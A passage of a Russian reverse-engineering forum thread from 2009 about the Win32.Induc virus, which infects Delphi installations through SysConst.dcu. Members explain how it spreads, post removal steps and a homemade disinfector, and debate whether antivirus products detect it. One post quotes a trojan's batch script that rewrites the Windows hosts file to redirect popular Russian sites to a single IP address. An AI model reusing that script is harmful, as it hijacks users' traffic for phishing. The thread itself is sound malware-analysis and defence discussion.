Сейчас на форуме: bartolomeo, tyns777 (+5 невидимых)

 eXeL@B —› Программирование —› Вниманию Делфи кодеров Win32.Induc
<< . 1 . 2 . 3 . 4 . 5 . 6 . >>
Посл.ответ Сообщение


Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 20 августа 2009 09:09 · Поправил: Flint
· Личное сообщение · #1

Сегодня обнаружил у себя два файла зараженных Win32.Induc
---------------------------------------------------------------------- -------------
Описание:

В интернете появился новый вирус Win32/Induc.A который заражает (используя интегрированную среду разработки программного обеспечения CodeGear Delphi) все приложения написанные на Delphi, такими например являются: QIP, AIMP и многие другие (вроде еще Skype, Total Commander, но не уверен).

Суть его в том, что заражённая программа ищет на диске установленные версии Delphi и, если находит, изменяет файл SysConst.dcu (старая версия сохраняется под именем SysConst.bak), и после этого все программы на Delphi, скомпилированные на этом компьютере, начинают точно так же заражать Delphi на тех компьютерах, где они запускаются.

Подробности

Для своего размножения Virus.Win32.Induc.a использует механизм двушагового создания исполняемых файлов, реализованный в среде Delphi. Согласно данному механизму, исходный код разрабатываемых приложений сначала компилируется в промежуточные .dcu-модули, из которых затем собираются исполняемые в Windows файлы.

Новый вирус активизируется при запуске заражённого им приложения и проверяет, установлен ли на компьютере пакет среды разработки Delphi версий 4.0-7.0. В случае обнаружения пакета, Virus.Win32.Induc.a внедряется в исходный файл базовых констант Delphi Sysconst.pas и компилирует его, в результате чего получается модифицированный откомпилированный файл базовых констант Sysconst.dcu.

Практически каждый проект Delphi включает строчку "use SysConst", поэтому заражение одного системного модуля ведет к инфицированию всех разрабатываемых приложений. Это приводит к тому, что в результате модификации Sysconst.dcu, в дальнейшем все программы, создаваемые в заражённой среде, содержат код нового вируса. Изменённый pas-файл вирусу больше не нужен и удаляется.


Распространению вируса способствовало то, что версия 8094 популярного мессенджера QIP оказались заражена им (команда разработчиков QIP приносит за это свои извинения). Пока единственный обнаруженный вредный эффект от вируса — это то, что из-за ошибки в его коде при запуске заражённой программы возникает Runtime error 3, если ключ реестра HKEY_LOCAL_MACHINE\SOFTWARE\Borland\Delphi\x.0 (x — от 4 до 7) содержит неправильное значение параметра RootDir (для правильного значения ошибки не происходит).

Хорошая новость
В настоящее время вирус не несет функциональной нагрузки помимо самого заражения, видимо пока просто обкатывается технология распространения вируса. Но вполне вероятно, что в будущем он может быть доработан киберпреступниками в сторону увеличения деструктивности.
Кстати разработчики QIP пересобрали сборку, обновив до версии 8095, не содержащей естественно вируса Страница загрузки

Только будте внимательны (!) устанавливая версию с инсталлятора выбирайте установку для опытных пользователей и внимательно смотрите на нужные и не нужные опции (замена стартовой страницы и установка IE8) ;)

Отсутствие заметной и деструктивной функциональности, инфицирование новым вирусом некоторых версий популярного интернет-пейджера QIP, а также обычная практика публикации .dcu-модулей разработчиками уже привели к широкому распространению Virus.Win32.Induc.a во всем мире.

Как бороться
Проверьте свои версии Delphi и, если найдёте у себя SysConst.bak, выполните следующие действия:
1. Удалите SysConst.dcu
2. Скопируйте SysConst.bak в SysConst.dcu. Важно именно скопировать, а не переименовать, чтобы SysConst.bak тоже остался на диске — это убережёт систему от повторного заражения.

И конечно проверить ПК антивирусом, это никогда не помешает. В настоящее время Win32/Induc.A детектят: Avast, Kaspersky, NOD32.
-----------------------------------------------------------------------------------------------------------------------------------
Откоментированный сорец чуть позже кину. И еще: делфи стаб при этом остается "стандартным" и на глаз заражение почти не заметно, сама функция заражения вызывается при этом в недрах стаба.

P.S. Думаю что эпидемия будет масштабной

-----
Nulla aetas ad discendum sera




Ранг: 60.6 (постоянный), 20thx
Активность: 0.070
Статус: Участник

Создано: 20 августа 2009 15:38 · Поправил: Модератор
· Личное сообщение · #2

Ara пишет:
а дайте скачать?

pass:1

Атач удалён



Ранг: 309.8 (мудрец), 21thx
Активность: 0.170
Статус: Участник

Создано: 20 августа 2009 15:45
· Личное сообщение · #3

Есть инфа, что это подпольное оружие, которое сделали простые пацаны из BHC для борьбы с гавнодельфикодерами.

-----
Shalom ebanats!




Ранг: 15.1 (новичок)
Активность: 0.020
Статус: Участник

Создано: 20 августа 2009 18:13 · Поправил: RZSoft
· Личное сообщение · #4

бл* у меня тож есь SysConst.bak (у меня 11 658 байт), а вы уверены что это вирус делает?
конечно глупо но мож ето делфи резерв копии делает)
и еще дата изменения этого файла у меня 9.08.2002
и зачем вирусу делать бэкап испорченного файла??




Ранг: 247.7 (наставник), 3thx
Активность: 0.160
Статус: Участник
Халявщик

Создано: 20 августа 2009 18:44
· Личное сообщение · #5

RZSoft
вирус подменяет дату на дату оригинального файла. И нет, не вирус, потому что вирусом его сложно назвать - ничего ведь не делает

-----
Лень - это подсознательная мудрость




Ранг: 255.8 (наставник), 19thx
Активность: 0.150.01
Статус: Участник
vx

Создано: 20 августа 2009 18:58
· Личное сообщение · #6

Никакой это не вирус. Код которого там не много, ничего не делает, ветвления в никуда, сех-фреймы не валидные, шлюзы не вызываются, только стек заполняет мусором.
Скомпиленный модуль в студию.



Ранг: 50.1 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 20 августа 2009 19:05
· Личное сообщение · #7

ClerkClerk пишет:
Никакой это не вирус. Код которого там не много, ничего не делает, ветвления в никуда, сех-фреймы не валидные, шлюзы не вызываются, только стек заполняет мусором.


Вирус, вирус.

Описание же и исходник есть.

Симптомы тоже известны.

Измени путь в реестре в RootDir и все зараженные проги вылетать с ошибкой начнут.



Ранг: 15.1 (новичок)
Активность: 0.020
Статус: Участник

Создано: 20 августа 2009 19:07
· Личное сообщение · #8

ну и хрен с ним этим вирусом раз ничего не делает
скомпиленый удалил, и непонятно зачем остался бэкап?



Ранг: 255.8 (наставник), 19thx
Активность: 0.150.01
Статус: Участник
vx

Создано: 20 августа 2009 19:07
· Личное сообщение · #9

Pluton
Я смотрел дамп в аттаче выше(20 августа 2009 15:38:29). Это мусор.



Ранг: 15.1 (новичок)
Активность: 0.020
Статус: Участник

Создано: 20 августа 2009 19:09
· Личное сообщение · #10

я изменил в реестре путь запускал дохрена прог написаных на делфях и никаких ошибок




Ранг: 533.6 (!), 232thx
Активность: 0.450
Статус: Uploader
retired

Создано: 20 августа 2009 19:30 · Поправил: BoRoV
· Личное сообщение · #11

у кого есть чистые файлы sysconst.dcu с 4 и 5 дельфей?

DarkWolf, спс!

-----
Лучше быть одиноким, но свободным © $me





Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 20 августа 2009 19:46
· Личное сообщение · #12

Подумал тут, если этот вирус скрестят с авторунером и добавят такой же модуль для заражения C++ проектов - получится полная жопа.

-----
Nulla aetas ad discendum sera




Ранг: 42.1 (посетитель)
Активность: 0.020
Статус: Участник

Создано: 20 августа 2009 20:02
· Личное сообщение · #13

BoRoV: держи!

97ef_20.08.2009_CRACKLAB.rU.tgz - d4d5.rar



Ранг: 50.1 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 20 августа 2009 21:10 · Поправил: Pluton
· Личное сообщение · #14

ClerkClerk пишет:
Я смотрел дамп в аттаче выше(20 августа 2009 15:38:29). Это мусор.


По крайней мере, DrWeb эту хрень опознает как вирус Индус.

Меня лично чуть не стошнило, когда я эту херь у себя в файлах обнаружил.. расползлась по скомпиленным файлам как эпидемия какая-то.

Я помню, что меня чуть не стошнило, когда я впервые обнаружил вирус Burglar у себя на свежекупленном компе x386.. Burglar, помню, размножался как кролик.

Сейчас то же самое.



Ранг: 101.0 (ветеран), 344thx
Активность: 1.150
Статус: Участник

Создано: 20 августа 2009 23:27
· Личное сообщение · #15

Flint пишет:
добавят такой же модуль для заражения C++ проектов

поэтому надо юзать msvc/gcc. там такого в принципе нельзя, особенно в gcc



Ранг: 221.3 (наставник), 135thx
Активность: 0.190.07
Статус: Участник

Создано: 21 августа 2009 02:48
· Личное сообщение · #16

Давайте щас еще будем диктовать на чем писать народу

-----
xchg dword [eax], eax




Ранг: 101.0 (ветеран), 344thx
Активность: 1.150
Статус: Участник

Создано: 21 августа 2009 10:26
· Личное сообщение · #17

void
А что так зло? Я имел в виду только компиляторы для Си++. Вот честно, ничего не имею против делфи. Но сам избегаю его.

БоРоВ обнаружил этот вирь даже в verA by PE_Kill (кто не помнит это плаг есть такой для определения версии аспротекта). Правда там безобидная вроде модификация.




Ранг: 1288.1 (!!!!), 273thx
Активность: 1.290
Статус: Участник

Создано: 21 августа 2009 10:30
· Личное сообщение · #18

progopis пишет:
БоРоВ обнаружил этот вирь даже в verA by PE_Kill (кто не помнит это плаг есть такой для определения версии аспротекта). Правда там безобидная вроде модификация.

наверно аверы сцут детектить этот вирь, т.к. сразу куча софта окажется зараженным и люди авер такой снесут накуй...



Ранг: 101.0 (ветеран), 344thx
Активность: 1.150
Статус: Участник

Создано: 21 августа 2009 10:53
· Личное сообщение · #19

Ara
Да аверы могли и не заметить/забить. Итак не все действительно опасные вирусы детектятся. А им ещё парится по поводу этой ерунды.



Ранг: 49.3 (посетитель), 43thx
Активность: 0.060
Статус: Участник

Создано: 21 августа 2009 11:07 · Поправил: user_
· Личное сообщение · #20

progopis пишет: Правда там безобидная вроде модификация.

Ara пишет: наверно аверы сцут детектить этот вирь, т.к. сразу куча софта окажется зараженным и люди авер такой снесут накуй...

Цитата с сайта ДрВеб (думаю, другие аверы подобно мыслят):
"...надо понимать ЧТО антивирусная программа Dr.Web определяет как вирус, а что нет. Не вдаваясь в технические детали, можно сказать, что вирусом разработчики Dr.Web считают работоспособные, то есть, способные нанести реальный вред компьютерные программы. В вирусную базу Dr.Web никогда не вносятся так называемые «битые» вирусы, неработоспособные коды... которые только утяжеляют ее (базу), но не несут реальной защиты пользователям."



Ранг: 5.1 (гость)
Активность: 0.010
Статус: Участник

Создано: 21 августа 2009 13:47
· Личное сообщение · #21

каким образом он на комп попадает,если касперский сканит весь трафик сетевой? и баз своих качает по 5 метров в день...



Ранг: 5.1 (гость)
Активность: 0.010
Статус: Участник

Создано: 21 августа 2009 13:53
· Личное сообщение · #22

все в очередной раз убедились что антивири это на 80% пиар и реклама,и лишь 20% реальная защита компа




Ранг: 238.8 (наставник), 67thx
Активность: 0.20
Статус: Участник
CyberHunter

Создано: 21 августа 2009 14:12
· Личное сообщение · #23

user_ пишет:
Цитата с сайта ДрВеб (думаю, другие аверы подобно мыслят):
"...надо понимать ЧТО антивирусная программа Dr.Web определяет как вирус, а что нет. Не вдаваясь в технические детали, можно сказать, что вирусом разработчики Dr.Web считают работоспособные, то есть, способные нанести реальный вред компьютерные программы. В вирусную базу Dr.Web никогда не вносятся так называемые «битые» вирусы, неработоспособные коды... которые только утяжеляют ее (базу), но не несут реальной защиты пользователям."


Что есть то есть, приведу пример моей переписки:

--- троянская dll, загружаемая криптованным exe (он определяется dr.web). Создает и запускает батник сл. содержания:

Code:
  1. @echo off
  2. echo 91.189.113.208 www.vkontakte.ru >> %windir%\system32\drivers\etc\hosts
  3. echo 91.189.113.208 vkontakte.ru >> %windir%\system32\drivers\etc\hosts
  4. echo 91.189.113.208 mail.ru >> %windir%\system32\drivers\etc\hosts
  5. echo 91.189.113.208 www.mail.ru >> %windir%\system32\drivers\etc\hosts
  6. echo 91.189.113.208 www.yandex.ru >> %windir%\system32\drivers\etc\hosts
  7. echo 91.189.113.208 yandex.ru >>  %windir%\system32\drivers\etc\hosts
  8. echo 91.189.113.208 www.odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts
  9. echo 91.189.113.208 odnoklasniki.ru >> %windir%\system32\drivers\etc\hosts


--- Ваш запрос был обработан Автоматической Системой. Присланный Вами файл находится в базе доверенных (чистых) файлов Dr.Web и не представляет угрозы. Если Вы уверены, что данный файл представляет угрозу, пожалуйста, сообщите подробности в ответе на данное письмо.

--- Данную dll создает криптованный полиморфом дроппер, который детектится dr.web. Если этот дропер закриптуют другим полиморфом, то детектится он перестанет, а dll останется прежней! Dll несет в себе
основной функционал - приведу описание того что она делает:

Cоздается b2e.dll, далее из dll вызывается одна функция B2E. Она делает текстовый файл binaries.txt
в который пишется строка client-serv.bat1 601, далее этот файл заново читается и создается файл
client-serv.bat, затем client-serv.bat запускается

Внутри него:
Code:
  1. .............

Т.о. при попытке пользователя зайти на сайты происходит редирект.
Сл-но эта dll не может быть доверенной!

В общем ответа нету до сих пор.

-----
Nulla aetas ad discendum sera




Ранг: 309.8 (мудрец), 21thx
Активность: 0.170
Статус: Участник

Создано: 21 августа 2009 15:08
· Личное сообщение · #24

> наверно аверы сцут детектить этот вирь, т.к. сразу куча софта окажется зараженным и люди авер такой снесут накуй...
я бы засцал ставить себе авер на дельфи)

-----
Shalom ebanats!




Ранг: 50.1 (постоянный)
Активность: 0.030
Статус: Участник

Создано: 21 августа 2009 16:03
· Личное сообщение · #25

Почему вы решили DrWeb не детектит данный вирь.

У меня детектит.

Последние базы.

Может недавно добавили.



Ранг: 60.6 (постоянный), 20thx
Активность: 0.070
Статус: Участник

Создано: 21 августа 2009 17:02 · Поправил: s0l
· Личное сообщение · #26

https://forum.antichat.ru/thread136277.html

MoleBox Ultra 4.1900 заражен =(((



Ранг: 107.5 (ветеран)
Активность: 0.150
Статус: Участник

Создано: 21 августа 2009 20:41
· Личное сообщение · #27

depler пишет:
Вообще убедительная просьба модерам и всем адекватным людям не выкладывать сорцов и тем более не коментить код если не хотите всплеска эпидемий

+1

CodeGear Delphi 2009 - все чисто. слава богу.
Из делфинных прог мало что юзаю.

-----
Md5 fcbb6c9c9a5029b24d70f2d67c7cca74





Ранг: 533.6 (!), 232thx
Активность: 0.450
Статус: Uploader
retired

Создано: 22 августа 2009 00:09 · Поправил: BoRoV
· Личное сообщение · #28

ну что...
вот я дописал свой антивирус, даю вам на рассмотрение:
- проверка и лечение делфи
- поиск как по всему компу, так и в заданных папках зараженых файлов
- лечение файлов(создаются резервные копии, также есть менеджер этих копий, чтоб востановить если что)

ну вобщем все ошибки что возникали у меня я все подавил, ошибок поидеии не должно быть, но.... ни в чем нельзя быть увереным на все 100

01e3_21.08.2009_CRACKLAB.rU.tgz - Antivirus.7z

-----
Лучше быть одиноким, но свободным © $me




Ранг: 22.3 (новичок)
Активность: 0.010
Статус: Участник

Создано: 22 августа 2009 00:46 · Поправил: SYNAPSiS
· Личное сообщение · #29

BoRoV
У меня вместо русских букв знаки вопроса (на кнопках). В основном окне (там где строчки с About) все ок
ось - седьмая винда




Ранг: 533.6 (!), 232thx
Активность: 0.450
Статус: Uploader
retired

Создано: 22 августа 2009 01:28
· Личное сообщение · #30

ыы
я даже не менял шрифт, то что стояло по умолчанию, а вот эбаут поменял, значит поставлю тот что в эбауте

вот с тем что в эбауте (Lucida)

3485_21.08.2009_CRACKLAB.rU.tgz - Antivirus.7z

-----
Лучше быть одиноким, но свободным © $me




Ранг: 22.3 (новичок)
Активность: 0.010
Статус: Участник

Создано: 22 августа 2009 01:46 · Поправил: SYNAPSiS
· Личное сообщение · #31

BoRoV
Не исправилось
http://i32.tinypic.com/zxq8y.png
плюс когда я нажимаю Alt в окне программы вдруг исчезают все кнопки

PS: имхо лучше на английском интерфейс сделать


<< . 1 . 2 . 3 . 4 . 5 . 6 . >>
 eXeL@B —› Программирование —› Вниманию Делфи кодеров Win32.Induc
Эта тема закрыта. Ответы больше не принимаются.
   Для печати Для печати